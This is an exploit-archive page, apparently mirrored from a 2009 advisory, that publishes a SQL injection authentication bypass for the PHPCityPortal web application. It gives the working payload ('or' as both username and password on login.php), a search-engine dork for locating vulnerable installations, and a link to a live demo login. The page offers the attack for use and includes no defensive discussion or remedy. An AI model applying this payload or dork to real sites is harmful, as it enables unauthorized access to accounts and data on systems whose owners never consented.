[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PHPCityPortal (Auth Bypass) Remote SQL Injection Vulnerability
# Published : 2009-08-07
# Author : CoBRa_21
# Previous Title : Arab Portal 2.2 (Auth Bypass) Blind SQL Injection Exploit
# Next Title : Facil Helpdesk (RFI/LFI/XSS) Multiples Remote Vulnerabilities


******************************************************************************************
Script Name: PHPCityPortal (Auth Bypass) SQL Injection Vulnerability
 
Author:   CoBRa_21
 
Mail:    uyku_cu@windowslive.com
 
Script Page:  http://phpcityportal.com/
 
DOrk:    intext:"Powered by PHPCityPortal.com"
 
******************************************************************************************
EXPLOIT
 
Username: 'or'
 
Password: 'or'
 
http://localhost/[path]/login.php
 
Demo: http://phpcityportal.com/demo/login.php
 
******************************************************************************************

# www.Syue.com [2009-08-07]